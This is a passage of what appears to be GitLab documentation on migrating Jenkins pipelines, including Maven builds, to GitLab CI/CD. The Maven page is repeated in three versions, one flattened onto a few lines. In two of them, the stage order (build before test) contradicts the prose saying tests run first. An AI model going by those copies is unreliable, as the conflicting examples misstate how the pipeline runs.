| `stages` | `stages` | Jenkins stages are groups of jobs. GitLab CI/CD also uses stages, but it is more flexible. You can have multiple stages each with multiple independent jobs. Use `stages` at the top level to define the stages and their execution order, and use `stage` at the job level to define the stage for that job. |
| `steps`  | `script` | Jenkins `steps` define what to execute. GitLab CI/CD uses a `script` section which is similar. The `script` section is a YAML array with separate entries for each command to run in sequence. |

#### Directives

| Jenkins | GitLab | Explanation |
|---------------|----------------|-------------|
| `environment` | `variables` | Jenkins uses `environment` for environment variables. GitLab CI/CD uses the `variables` keyword to define CI/CD variables that can be used during job execution, but also for more dynamic pipeline configuration. These can also be set in the GitLab UI, under CI/CD settings. |
| `options` | Not applicable | Jenkins uses `options` for additional configuration, including timeouts and retry values. GitLab does not need a separate section for options; all configuration is added as CI/CD keywords at the job or pipeline level, for example `timeout` or `retry`. |
| `parameters` | Not applicable | In Jenkins, parameters can be required when triggering a pipeline. Parameters are handled in GitLab with CI/CD variables, which can be defined in many places, including the pipeline configuration, project settings, manually at runtime through the UI, or through the API. |
| `triggers` | `rules` | In Jenkins, `triggers` defines when a pipeline should run again, for example through cron notation. GitLab CI/CD can run pipelines automatically for many reasons, including Git changes and merge request updates. Use the `rules` keyword to control which events to run jobs for. Scheduled pipelines are defined in the project settings. |
| `tools` | Not applicable | In Jenkins, `tools` defines additional tools to install in the environment. GitLab does not have a similar keyword, as the recommendation is to use container images prebuilt with the exact tools required for your jobs. These images can be cached and can be built to already contain the tools you need for your pipelines. If a job needs additional tools, they can be installed as part of a `before_script` section. |
| `input` | Not applicable | In Jenkins, `input` adds a prompt for user input. Similar to `parameters`, inputs are handled in GitLab through CI/CD variables. |
| `when` | `rules` | In Jenkins, `when` defines when a stage should be executed. GitLab also has a `when` keyword, which defines whether a job should start running based on the status of earlier jobs, for example if jobs passed or failed. To control when to add jobs to specific pipelines, use `rules`. |

### Common configurations

This section goes over commonly used CI/CD configurations, showing how they can be converted from Jenkins to GitLab CI/CD.

[Jenkins pipelines](https://www.jenkins.io/doc/book/pipeline/) generate automated CI/CD jobs that are triggered when certain events take place, such as a new commit being pushed. A Jenkins pipeline is defined in a `Jenkinsfile`. The GitLab equivalent is the [`.gitlab-ci.yml` configuration file](../yaml/_index.md).

Jenkins does not provide a place to store source code, so the `Jenkinsfile` must be stored in a separate source control repository.

#### Jobs

Jobs are a set of commands that run in a set sequence to achieve a particular result. For example, build a container then deploy it to production, in a `Jenkinsfile`:

```groovy
pipeline {
    agent any
    stages {
        stage('build') {
            agent { docker 'golang:alpine' }
            steps {
                sh 'apk update'
                sh 'go build -o bin/hello'
            }
            post {
                always {
                    archiveArtifacts artifacts: 'bin/hello', onlyIfSuccessful: true
                }
            }
        }
        stage('deploy') {
            agent { docker 'golang:alpine' }
            when {
                branch 'staging'
            }
            steps {
                echo "Deploying to staging"
                sh 'scp bin/hello remoteuser@remotehost:/remote/directory'
            }
        }
    }
}
```

This example:

- Uses the `golang:alpine` container image.
- Runs a job for building code.
- Stores the built executable as an artifact.
- Adds a second job to deploy to `staging`, which:
  - Runs only if the commit targets the `staging` branch.
  - Starts after the build stage succeeds.
  - Uses the built executable artifact from the earlier job.
The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
default:
  image: golang:alpine

stages:
  - build
  - deploy

build-job:
  stage: build
  script:
    - apk update
    - go build -o bin/hello
  artifacts:
    paths:
      - bin/hello
    expire_in: 1 week

deploy-job:
  stage: deploy
  script:
    - echo "Deploying to Staging"
    - scp bin/hello remoteuser@remotehost:/remote/directory
  rules:
    - if: $CI_COMMIT_BRANCH == 'staging'
  artifacts:
    paths:
      - bin/hello
```

##### Parallel

In Jenkins, jobs that are not dependent on previous jobs can run in parallel when added to a `parallel` section. For example, in a `Jenkinsfile`:

```groovy
pipeline {
    agent any
    stages {
        stage('Parallel') {
            parallel {
                stage('Python') {
                    agent { docker 'python:latest' }
                    steps {
                        sh "python --version"
                    }
                }
                stage('Java') {
                    agent { docker 'openjdk:latest' }
                    when {
                        branch 'staging'
                    }
                    steps {
                        sh "java -version"
                    }
                }
            }
        }
    }
}
```

This example runs a Python and a Java job in parallel, using different container images. The Java job only runs when the `staging` branch is changed.

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
python-version:
  image: python:latest
  script:
    - python --version

java-version:
  image: openjdk:latest
  rules:
    - if: $CI_COMMIT_BRANCH == 'staging'
  script:
    - java -version
```

In this case, no extra configuration is needed to make the jobs run in parallel. Jobs run in parallel by default, each on a different runner assuming there are enough runners for all the jobs. The Java job is set to only run when the `staging` branch is changed.

##### Matrix

In GitLab you can use a matrix to run a job multiple times in parallel in a single pipeline, but with different variable values for each instance of the job. Jenkins runs the matrix sequentially.
For example, in a `Jenkinsfile`:

```groovy
matrix {
    axes {
        axis {
            name 'PLATFORM'
            values 'linux', 'mac', 'windows'
        }
        axis {
            name 'ARCH'
            values 'x64', 'x86'
        }
    }
    stages {
        stage('build') {
            steps {
                echo "Building $PLATFORM for $ARCH"
            }
        }
        stage('test') {
            steps {
                echo "Testing $PLATFORM for $ARCH"
            }
        }
        stage('deploy') {
            steps {
                echo "Deploying $PLATFORM for $ARCH"
            }
        }
    }
}
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
stages:
  - build
  - test
  - deploy

.parallel-hidden-job:
  parallel:
    matrix:
      - PLATFORM: [linux, mac, windows]
        ARCH: [x64, x86]

build-job:
  extends: .parallel-hidden-job
  stage: build
  script:
    - echo "Building $PLATFORM for $ARCH"

test-job:
  extends: .parallel-hidden-job
  stage: test
  script:
    - echo "Testing $PLATFORM for $ARCH"

deploy-job:
  extends: .parallel-hidden-job
  stage: deploy
  script:
    - echo "Deploying $PLATFORM for $ARCH"
```

#### Container Images

In GitLab you can [run your CI/CD jobs in separate, isolated Docker containers](../docker/using_docker_images.md) using the [image](../yaml/_index.md#image) keyword.

For example, in a `Jenkinsfile`:

```groovy
stage('Version') {
    agent { docker 'python:latest' }
    steps {
        echo 'Hello Python'
        sh 'python --version'
    }
}
```

This example shows commands running in a `python:latest` container.

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
version-job:
  image: python:latest
  script:
    - echo "Hello Python"
    - python --version
```

#### Variables

In GitLab, use the `variables` keyword to define [CI/CD variables](../variables/_index.md). Use variables to reuse configuration data, have more dynamic configuration, or store important values. Variables can be defined either globally or per job.
For example, in a `Jenkinsfile`:

```groovy
pipeline {
    agent any
    environment {
        NAME = 'Fern'
    }
    stages {
        stage('English') {
            environment {
                GREETING = 'Hello'
            }
            steps {
                sh 'echo "$GREETING $NAME"'
            }
        }
        stage('Spanish') {
            environment {
                GREETING = 'Hola'
            }
            steps {
                sh 'echo "$GREETING $NAME"'
            }
        }
    }
}
```

This example shows how variables can be used to pass values to commands in jobs.

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
default:
  image: alpine:latest

stages:
  - greet

variables:
  NAME: "Fern"

english:
  stage: greet
  variables:
    GREETING: "Hello"
  script:
    - echo "$GREETING $NAME"

spanish:
  stage: greet
  variables:
    GREETING: "Hola"
  script:
    - echo "$GREETING $NAME"
```

Variables can also be [set in the GitLab UI, in the CI/CD settings](../variables/_index.md#define-a-cicd-variable-in-the-ui). In some cases, you can use [protected](../variables/_index.md#protect-a-cicd-variable) and [masked](../variables/_index.md#mask-a-cicd-variable) variables for secret values. These variables can be accessed in pipeline jobs the same as variables defined in the configuration file.

For example, in a `Jenkinsfile`:

```groovy
pipeline {
    agent any
    stages {
        stage('Example Username/Password') {
            environment {
                AWS_ACCESS_KEY = credentials('aws-access-key')
            }
            steps {
                sh 'my-login-script.sh $AWS_ACCESS_KEY'
            }
        }
    }
}
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
login-job:
  script:
    - my-login-script.sh $AWS_ACCESS_KEY
```

Additionally, GitLab CI/CD makes [predefined variables](../variables/predefined_variables.md) available to every pipeline and job which contain values relevant to the pipeline and repository.

#### Expressions and conditionals

When a new pipeline starts, GitLab checks which jobs should run in that pipeline. You can configure jobs to run depending on factors like the status of variables, or the pipeline type.
For example, in a `Jenkinsfile`:

```groovy
stage('deploy_staging') {
    agent { docker 'alpine:latest' }
    when {
        branch 'staging'
    }
    steps {
        echo "Deploying to staging"
    }
}
```

In this example, the job only runs when the branch we are committing to is named `staging`.

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
deploy_staging:
  stage: deploy
  script:
    - echo "Deploy to staging server"
  rules:
    - if: '$CI_COMMIT_BRANCH == "staging"'
```

#### Runners

Like Jenkins agents, GitLab runners are the hosts that run jobs. If you are using GitLab.com, you can use the [instance runner fleet](../runners/_index.md) to run jobs without provisioning your own runners.

To convert a Jenkins agent for use with GitLab CI/CD, uninstall the agent and then [install and register a runner](../runners/_index.md). Runners do not require much overhead, so you might be able to use similar provisioning as the Jenkins agents you were using.

Some key details about runners:

- Runners can be [configured](../runners/runners_scope.md) to be shared across an instance, a group, or dedicated to a single project.
- You can use the [`tags` keyword](../runners/configure_runners.md#control-jobs-that-a-runner-can-run) for finer control, and associate runners with specific jobs. For example, you can use a tag for jobs that require dedicated, more powerful, or specific hardware.
- GitLab has [autoscaling for runners](https://docs.gitlab.com/runner/configuration/autoscale.html). Use autoscaling to provision runners only when needed and scale down when not needed.
For example, in a `Jenkinsfile`:

```groovy
pipeline {
    agent none
    stages {
        stage('Linux') {
            agent { label 'linux' }
            steps {
                echo "Hello, $USER"
            }
        }
        stage('Windows') {
            agent { label 'windows' }
            steps {
                echo "Hello, %USERNAME%"
            }
        }
    }
}
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
linux_job:
  stage: build
  tags:
    - linux
  script:
    - echo "Hello, $USER"

windows_job:
  stage: build
  tags:
    - windows
  script:
    - echo "Hello, %USERNAME%"
```

#### Artifacts

In GitLab, any job can use the [`artifacts`](../yaml/_index.md#artifacts) keyword to define a set of artifacts to be stored when a job completes. [Artifacts](../jobs/job_artifacts.md) are files that can be used in later jobs, for example for testing or deployment.

For example, in a `Jenkinsfile`:

```groovy
stages {
    stage('Generate Cat') {
        steps {
            sh 'touch cat.txt'
            sh 'echo "meow" > cat.txt'
        }
        post {
            always {
                archiveArtifacts artifacts: 'cat.txt', onlyIfSuccessful: true
            }
        }
    }
    stage('Use Cat') {
        steps {
            sh 'cat cat.txt'
        }
    }
}
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
stages:
  - generate
  - use

generate_cat:
  stage: generate
  script:
    - touch cat.txt
    - echo "meow" > cat.txt
  artifacts:
    paths:
      - cat.txt
    expire_in: 1 week

use_cat:
  stage: use
  script:
    - cat cat.txt
  artifacts:
    paths:
      - cat.txt
```

#### Caching

A [cache](../caching/_index.md) is created when a job downloads one or more files and saves them for faster access in the future. Subsequent jobs that use the same cache don't have to download the files again, so they execute more quickly. The cache is stored on the runner and uploaded to S3 if [distributed cache is enabled](https://docs.gitlab.com/runner/configuration/autoscale.html#distributed-runners-caching). Jenkins core does not provide caching.

For example, in a `.gitlab-ci.yml` file:

```yaml
cache-job:
  script:
    - echo "This job uses a cache."
  cache:
    key: binaries-cache-$CI_COMMIT_REF_SLUG
    paths:
      - binaries/
```

### Jenkins plugins

Some functionality in Jenkins that is enabled through plugins is supported natively in GitLab with keywords and features that offer similar functionality. For example:

| Jenkins plugin | GitLab feature |
|-----------------------------------------------------------------------------------|----------------|
| [Build Timeout](https://plugins.jenkins.io/build-timeout/) | [`timeout` keyword](../yaml/_index.md#timeout) |
| [Cobertura](https://plugins.jenkins.io/cobertura/) | [Coverage report artifacts](../yaml/artifacts_reports.md#artifactsreportscoverage_report) and [Code coverage](../testing/code_coverage/_index.md) |
| [Code coverage API](https://plugins.jenkins.io/code-coverage-api/) | [Code coverage](../testing/code_coverage/_index.md) and [Coverage visualization](../testing/code_coverage/_index.md#coverage-visualization) |
| [Embeddable Build Status](https://plugins.jenkins.io/embeddable-build-status/) | [Pipeline status badges](../../user/project/badges.md#pipeline-status-badges) |
| [JUnit](https://plugins.jenkins.io/junit/) | [JUnit test report artifacts](../yaml/artifacts_reports.md#artifactsreportsjunit) and [Unit test reports](../testing/unit_test_reports.md) |
| [Mailer](https://plugins.jenkins.io/mailer/) | [Notification emails](../../user/profile/notifications.md) |
| [Parameterized Trigger Plugin](https://plugins.jenkins.io/parameterized-trigger/) | [`trigger` keyword](../yaml/_index.md#trigger) and [downstream pipelines](../pipelines/downstream_pipelines.md) |
| [Role-based Authorization Strategy](https://plugins.jenkins.io/role-strategy/) | GitLab [permissions and roles](../../user/permissions.md) |
| [Timestamper](https://plugins.jenkins.io/timestamper/) | [Job](../jobs/_index.md) logs are timestamped by default |

### Security Scanning features

You might have used plugins for things like code quality, security, or static application scanning in Jenkins.
GitLab provides [security scanners](../../user/application_security/_index.md) out-of-the-box to detect vulnerabilities in all parts of the SDLC. You can add these scanners to your pipeline in GitLab by using templates. For example, to add SAST scanning to your pipeline, add the following to your `.gitlab-ci.yml`:

```yaml
include:
  - template: Jobs/SAST.gitlab-ci.yml
```

You can customize the behavior of security scanners by using CI/CD variables, for example with the [SAST scanners](../../user/application_security/sast/_index.md#available-cicd-variables).

### Secrets Management

Privileged information, often referred to as "secrets", is sensitive information or credentials you need in your CI/CD workflow. You might use secrets to unlock protected resources or sensitive information in tools, applications, containers, and cloud-native environments.

Secrets management in Jenkins is usually handled with the `Secret` type field or the Credentials Plugin. Credentials stored in the Jenkins settings can be exposed to jobs as environment variables by using the Credentials Binding plugin.

For secrets management in GitLab, you can use one of the supported integrations for an external service. These services securely store secrets outside of your GitLab project, though you must have a subscription for the service:

- [HashiCorp Vault](../secrets/hashicorp_vault.md)
- [Azure Key Vault](../secrets/azure_key_vault.md)
- [Google Cloud Secret Manager](../secrets/gcp_secret_manager.md)

GitLab also supports [OIDC authentication](../secrets/id_token_authentication.md) for other third-party services that support OIDC.

Additionally, you can make credentials available to jobs by storing them in CI/CD variables, though secrets stored in plain text are susceptible to accidental exposure, [the same as in Jenkins](https://www.jenkins.io/doc/developer/security/secrets/#storing-secrets).
You should always store sensitive information in [masked](../variables/_index.md#mask-a-cicd-variable) and [protected](../variables/_index.md#protect-a-cicd-variable) variables, which mitigates some of the risk.

Also, never store secrets as variables in your `.gitlab-ci.yml` file, which is visible to all users with access to the project. Storing sensitive information in variables should only be done in [the project, group, or instance settings](../variables/_index.md#define-a-cicd-variable-in-the-ui).

Review the [security guidelines](../variables/_index.md#cicd-variable-security) to improve the safety of your CI/CD variables.

## Planning and Performing a Migration

The following list of recommended steps was created after observing organizations that were able to quickly complete this migration.

### Create a Migration Plan

Before starting a migration you should create a [migration plan](plan_a_migration.md) to make preparations for the migration. For a migration from Jenkins, ask yourself the following questions in preparation:

- What plugins are used by jobs in Jenkins today?
  - Do you know what these plugins do exactly?
  - Do any plugins wrap a common build tool? For example, Maven, Gradle, or NPM?
- What is installed on the Jenkins agents?
- Are there any shared libraries in use?
- How are you authenticating from Jenkins? Are you using SSH keys, API tokens, or other secrets?
- Are there other projects that you need to access from your pipeline?
- Are there credentials in Jenkins to access outside services? For example Ansible Tower, Artifactory, or other Cloud Providers or deployment targets?

### Prerequisites

Before doing any migration work, you should first:

1. Get familiar with GitLab.
   - Read about the [key GitLab CI/CD features](../_index.md).
   - Follow tutorials to create [your first GitLab pipeline](../quick_start/_index.md) and [more complex pipelines](../quick_start/tutorial.md) that build, test, and deploy a static site.
   - Review the [CI/CD YAML syntax reference](../yaml/_index.md).
1. Set up and configure GitLab.
1. Test your GitLab instance.
   - Ensure [runners](../runners/_index.md) are available, either by using shared GitLab.com runners or installing new runners.

### Migration Steps

1. Migrate projects from your SCM solution to GitLab.
   - (Recommended) You can use the available [importers](../../user/project/import/_index.md) to automate mass imports from external SCM providers.
   - You can [import repositories by URL](../../user/project/import/repo_by_url.md).
1. Create a `.gitlab-ci.yml` file in each project.
1. Migrate Jenkins configuration to GitLab CI/CD jobs and configure them to show results directly in merge requests.
1. Migrate deployment jobs by using [cloud deployment templates](../cloud_deployment/_index.md), [environments](../environments/_index.md), and the [GitLab agent for Kubernetes](../../user/clusters/agent/_index.md).
1. Check if any CI/CD configuration can be reused across different projects, then create and share CI/CD templates.
1. Check the [pipeline efficiency documentation](../pipelines/pipeline_efficiency.md) to learn how to make your GitLab CI/CD pipelines faster and more efficient.

### Additional Resources

- You can use the [JenkinsFile Wrapper](https://gitlab.com/gitlab-org/jfr-container-builder/) to run a complete Jenkins instance inside of a GitLab CI/CD job, including plugins. Use this tool to help ease the transition to GitLab CI/CD, by delaying the migration of less urgent pipelines.

{{< alert type="note" >}}

The JenkinsFile Wrapper is not packaged with GitLab and falls outside of the scope of support. For more information, see the [Statement of Support](https://about.gitlab.com/support/statement-of-support/).

{{< /alert >}}

If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource.
---
stage: Verify
group: Pipeline Authoring
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Migrate a Maven build from Jenkins to GitLab CI/CD
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

If you have a Maven build in Jenkins, you can use a [Java Spring](https://gitlab.com/gitlab-org/project-templates/spring) project template to migrate to GitLab. The template uses Maven for its underlying dependency management.

## Sample Jenkins configurations

The following three Jenkins examples each use different methods to test, build, and install a Maven project into a shell agent:

- Freestyle with shell execution
- Freestyle with the Maven task plugin
- A declarative pipeline using a Jenkinsfile

All three examples run the same three commands in order, in three different stages:

- `mvn test`: Run any tests found in the codebase.
- `mvn package -DskipTests`: Compile the code into an executable type defined in the POM and skip running any tests because that was done in the first stage.
- `mvn install -DskipTests`: Install the compiled executable into the agent's local Maven `.m2` repository and again skip running the tests.

These examples use a single, persistent Jenkins agent, which requires Maven to be pre-installed on the agent. This method of execution is similar to a GitLab Runner using the [shell executor](https://docs.gitlab.com/runner/executors/shell.html).
### Freestyle with shell execution

If using Jenkins' built-in shell execution option to directly call `mvn` commands from the shell on the agent, the configuration might look like:

![Jenkins UI that shows build steps with Maven commands defined as shell commands.](img/maven-freestyle-shell_v16_4.png)

### Freestyle with Maven task plugin

If using the Maven plugin in Jenkins to declare and execute any specific goals in the [Maven build lifecycle](https://maven.apache.org/guides/introduction/introduction-to-the-lifecycle.html), the configuration might look like:

![Jenkins UI that shows build steps with Maven commands defined using the Maven plugin.](img/maven-freestyle-plugin_v16_4.png)

This plugin requires Maven to be installed on the Jenkins agent, and uses a script wrapper for calling Maven commands.

### Using a declarative pipeline

If using a declarative pipeline, the configuration might look like:

```groovy
pipeline {
    agent any
    tools {
        maven 'maven-3.6.3'
        jdk 'jdk11'
    }
    stages {
        stage('Build') {
            steps {
                sh "mvn package -DskipTests"
            }
        }
        stage('Test') {
            steps {
                sh "mvn test"
            }
        }
        stage('Install') {
            steps {
                sh "mvn install -DskipTests"
            }
        }
    }
}
```

This example uses shell execution commands instead of plugins. By default, a declarative pipeline configuration is stored either in the Jenkins pipeline configuration or directly in the Git repository in a `Jenkinsfile`.

## Convert Jenkins configuration to GitLab CI/CD

While the previous examples are all slightly different, they can all be migrated to GitLab CI/CD with the same pipeline configuration.

Prerequisites:

- A GitLab Runner with a shell executor
- Maven 3.6.3 and a Java 11 JDK installed on the shell runner

This example mimics the behavior and syntax of building, testing, and installing on Jenkins. In a GitLab CI/CD pipeline, the commands run in "jobs", which are grouped into stages.
The migrated configuration in the `.gitlab-ci.yml` configuration file consists of two global keywords (`stages` and `variables`) followed by 3 jobs: ```yaml stages: - build - test - install variables: MAVEN_OPTS: >- -Dhttps.protocols=TLSv1.2 -Dmaven.repo.local=$CI_PROJECT_DIR/.m2/repository MAVEN_CLI_OPTS: >- -DskipTests build-JAR: stage: build script: - mvn $MAVEN_CLI_OPTS package test-code: stage: test script: - mvn test install-JAR: stage: install script: - mvn $MAVEN_CLI_OPTS install ``` In this example: - `stages` defines three stages that run in order. Like the previous Jenkins examples, the test job runs first, followed by the build job, and finally the install job. - `variables` defines [CI/CD variables](../../variables/_index.md) that can be used by all jobs: - `MAVEN_OPTS` are Maven environment variables needed whenever Maven is executed: - `-Dhttps.protocols=TLSv1.2` sets the TLS protocol to version 1.2 for any HTTP requests in the pipeline. - `-Dmaven.repo.local=$CI_PROJECT_DIR/.m2/repository` sets the location of the local Maven repository to the GitLab project directory on the runner, so the job can access and modify the repository. - `MAVEN_CLI_OPTS` are specific arguments to be added to `mvn` commands: - `-DskipTests` skips the `test` stage in the Maven build lifecycle. - `test-code`, `build-JAR`, and `install-JAR` are the user-defined names for the jobs to run in the pipeline: - `stage` defines which stage the job runs in. A pipeline contains one or more stages and a stage contains one or more jobs. This example has three stages, each with a single job. - `script` defines the commands to run in that job, similar to `steps` in a `Jenkinsfile`. Jobs can run multiple commands in sequence, which run in the image container, but in this example the jobs run only one command each. 
### Run jobs in Docker containers Instead of using a persistent machine for handling this build process like the Jenkins samples, this example uses an ephemeral Docker container to handle execution. Using a container removes the need for maintaining a virtual machine and the Maven version installed on it. It also increases flexibility for expanding and extending the functionality of the pipeline. Prerequisites: - A GitLab Runner with the Docker executor that can be used by the project. If you are using GitLab.com, you can use the public instance runners. This migrated pipeline configuration consists of three global keywords (`stages`, `default`, and `variables`) followed by 3 jobs. This configuration makes use of additional GitLab CI/CD features for an improved pipeline compared to the [previous example](#convert-jenkins-configuration-to-gitlab-cicd): ```yaml stages: - build - test - install default: image: maven:3.6.3-openjdk-11 cache: key: $CI_COMMIT_REF_SLUG paths: - .m2/ variables: MAVEN_OPTS: >- -Dhttps.protocols=TLSv1.2 -Dmaven.repo.local=$CI_PROJECT_DIR/.m2/repository MAVEN_CLI_OPTS: >- -DskipTests build-JAR: stage: build script: - mvn $MAVEN_CLI_OPTS package test-code: stage: test script: - mvn test install-JAR: stage: install script: - mvn $MAVEN_CLI_OPTS install ``` In this example: - `stages` defines three stages that run in order. Like the previous Jenkins examples, the test job runs first, followed by the build job, and finally the install job. - `default` defines standard configuration to reuse in all jobs by default: - `image` defines the Docker image container to use and execute commands in. In this example, it's an official Maven Docker image with everything needed already installed. - `cache` is used to cache and reuse dependencies: - `key` is the unique identifier for the specific cache archive. In this example, it's a shortened version of the Git commit ref, autogenerated as a [predefined CI/CD variable](../../variables/predefined_variables.md). 
Any job that runs for the same commit ref reuses the same cache. - `paths` are the directories or files to include in the cache. In this example, we cache the `.m2/` directory to avoid re-installing dependencies between job runs. - `variables` defines [CI/CD variables](../../variables/_index.md) that can be used by all jobs: - `MAVEN_OPTS` are Maven environment variables needed whenever Maven is executed: - `-Dhttps.protocols=TLSv1.2` sets the TLS protocol to version 1.2 for any HTTP requests in the pipeline. - `-Dmaven.repo.local=$CI_PROJECT_DIR/.m2/repository` sets the location of the local Maven repository to the GitLab project directory on the runner, so the job can access and modify the repository. - `MAVEN_CLI_OPTS` are specific arguments to be added to `mvn` commands: - `-DskipTests` skips the `test` stage in the Maven build lifecycle. - `test-code`, `build-JAR`, and `install-JAR` are the user-defined names for the jobs to run in the pipeline: - `stage` defines which stage the job runs in. A pipeline contains one or more stages and a stage contains one or more jobs. This example has three stages, each with a single job. - `script` defines the commands to run in that job, similar to `steps` in a `Jenkinsfile`. Jobs can run multiple commands in sequence, which run in the image container, but in this example the jobs run only one command each.
---
stage: Verify
group: Pipeline Authoring
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Migrate a Maven build from Jenkins to GitLab CI/CD
breadcrumbs:
- doc
- ci
- migration
- examples
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

If you have a Maven build in Jenkins, you can use a
[Java Spring](https://gitlab.com/gitlab-org/project-templates/spring) project template
to migrate to GitLab. The template uses Maven for its underlying dependency management.

## Sample Jenkins configurations

The following three Jenkins examples each use different methods to test, build,
and install a Maven project into a shell agent:

- Freestyle with shell execution
- Freestyle with the Maven task plugin
- A declarative pipeline using a Jenkinsfile

All three examples run the same three commands in order, in three different stages:

- `mvn test`: Run any tests found in the codebase.
- `mvn package -DskipTests`: Compile the code into an executable type defined in the POM,
  and skip running any tests because that was done in the first stage.
- `mvn install -DskipTests`: Install the compiled executable into the agent's
  local Maven `.m2` repository, and again skip running the tests.

These examples use a single, persistent Jenkins agent, which requires Maven to be
pre-installed on the agent. This method of execution is similar to a GitLab Runner
using the [shell executor](https://docs.gitlab.com/runner/executors/shell.html).
### Freestyle with shell execution

If using Jenkins' built-in shell execution option to directly call `mvn` commands
from the shell on the agent, the configuration might look like:

![Jenkins UI that shows build steps with Maven commands defined as shell commands.](img/maven-freestyle-shell_v16_4.png)

### Freestyle with Maven task plugin

If using the Maven plugin in Jenkins to declare and execute any specific goals in the
[Maven build lifecycle](https://maven.apache.org/guides/introduction/introduction-to-the-lifecycle.html),
the configuration might look like:

![Jenkins UI that shows build steps with Maven commands defined using the Maven plugin.](img/maven-freestyle-plugin_v16_4.png)

This plugin requires Maven to be installed on the Jenkins agent, and uses a script
wrapper for calling Maven commands.

### Using a declarative pipeline

If using a declarative pipeline, the configuration might look like:

```groovy
pipeline {
    agent any
    tools {
        maven 'maven-3.6.3'
        jdk 'jdk11'
    }
    stages {
        stage('Test') {
            steps {
                sh "mvn test"
            }
        }
        stage('Build') {
            steps {
                sh "mvn package -DskipTests"
            }
        }
        stage('Install') {
            steps {
                sh "mvn install -DskipTests"
            }
        }
    }
}
```

This example uses shell execution commands instead of plugins. By default, a declarative
pipeline configuration is stored either in the Jenkins pipeline configuration or directly
in the Git repository in a `Jenkinsfile`.

## Convert Jenkins configuration to GitLab CI/CD

While the previous examples are all slightly different, they can all be migrated
to GitLab CI/CD with the same pipeline configuration.

Prerequisites:

- A GitLab Runner with a shell executor
- Maven 3.6.3 and the Java 11 JDK installed on the shell runner

This example mimics the behavior and syntax of building, testing, and installing
on Jenkins. In a GitLab CI/CD pipeline, the commands run in "jobs", which are
grouped into stages.
The migrated configuration in the `.gitlab-ci.yml` configuration file consists of
two global keywords (`stages` and `variables`) followed by three jobs:

```yaml
stages:
  - test
  - build
  - install

variables:
  MAVEN_OPTS: >-
    -Dhttps.protocols=TLSv1.2
    -Dmaven.repo.local=$CI_PROJECT_DIR/.m2/repository
  MAVEN_CLI_OPTS: >-
    -DskipTests

build-JAR:
  stage: build
  script:
    - mvn $MAVEN_CLI_OPTS package

test-code:
  stage: test
  script:
    - mvn test

install-JAR:
  stage: install
  script:
    - mvn $MAVEN_CLI_OPTS install
```

In this example:

- `stages` defines three stages that run in order. Like the previous Jenkins examples,
  the test job runs first, followed by the build job, and finally the install job.
- `variables` defines [CI/CD variables](../../variables/_index.md) that can be used by all jobs:
  - `MAVEN_OPTS` are Maven environment variables needed whenever Maven is executed:
    - `-Dhttps.protocols=TLSv1.2` sets the TLS protocol to version 1.2 for any
      HTTP requests in the pipeline.
    - `-Dmaven.repo.local=$CI_PROJECT_DIR/.m2/repository` sets the location of the local
      Maven repository to the GitLab project directory on the runner, so the job can
      access and modify the repository.
  - `MAVEN_CLI_OPTS` are specific arguments to be added to `mvn` commands:
    - `-DskipTests` skips the `test` stage in the Maven build lifecycle.
- `test-code`, `build-JAR`, and `install-JAR` are the user-defined names for the jobs
  to run in the pipeline:
  - `stage` defines which stage the job runs in. A pipeline contains one or more stages
    and a stage contains one or more jobs. This example has three stages, each with a
    single job.
  - `script` defines the commands to run in that job, similar to `steps` in a `Jenkinsfile`.
    Jobs can run multiple commands in sequence, but in this example the jobs run only
    one command each.
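The `MAVEN_CLI_OPTS` usage above relies on ordinary shell variable expansion. As a quick illustration outside any pipeline, this sketch shows the command line the runner's shell produces; the variable value is copied from the configuration above:

```shell
# Value copied from the pipeline configuration above.
MAVEN_CLI_OPTS="-DskipTests"

# The runner's shell expands the variable before Maven runs, so
# `mvn $MAVEN_CLI_OPTS package` becomes the command line below.
effective_command="mvn $MAVEN_CLI_OPTS package"
echo "$effective_command"   # mvn -DskipTests package
```

Adding more flags to `MAVEN_CLI_OPTS` in one place therefore changes every job that references the variable.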
### Run jobs in Docker containers

Instead of using a persistent machine for handling this build process like the Jenkins
samples, this example uses an ephemeral Docker container to handle execution. Using a
container removes the need for maintaining a virtual machine and the Maven version
installed on it. It also increases flexibility for expanding and extending the
functionality of the pipeline.

Prerequisites:

- A GitLab Runner with the Docker executor that can be used by the project.
  If you are using GitLab.com, you can use the public instance runners.

This migrated pipeline configuration consists of three global keywords (`stages`,
`default`, and `variables`) followed by three jobs. This configuration makes use of
additional GitLab CI/CD features for an improved pipeline compared to the
[previous example](#convert-jenkins-configuration-to-gitlab-cicd):

```yaml
stages:
  - test
  - build
  - install

default:
  image: maven:3.6.3-openjdk-11
  cache:
    key: $CI_COMMIT_REF_SLUG
    paths:
      - .m2/

variables:
  MAVEN_OPTS: >-
    -Dhttps.protocols=TLSv1.2
    -Dmaven.repo.local=$CI_PROJECT_DIR/.m2/repository
  MAVEN_CLI_OPTS: >-
    -DskipTests

build-JAR:
  stage: build
  script:
    - mvn $MAVEN_CLI_OPTS package

test-code:
  stage: test
  script:
    - mvn test

install-JAR:
  stage: install
  script:
    - mvn $MAVEN_CLI_OPTS install
```

In this example:

- `stages` defines three stages that run in order. Like the previous Jenkins examples,
  the test job runs first, followed by the build job, and finally the install job.
- `default` defines standard configuration to reuse in all jobs by default:
  - `image` defines the Docker image container to use and execute commands in.
    In this example, it's an official Maven Docker image with everything needed
    already installed.
  - `cache` is used to cache and reuse dependencies:
    - `key` is the unique identifier for the specific cache archive. In this example,
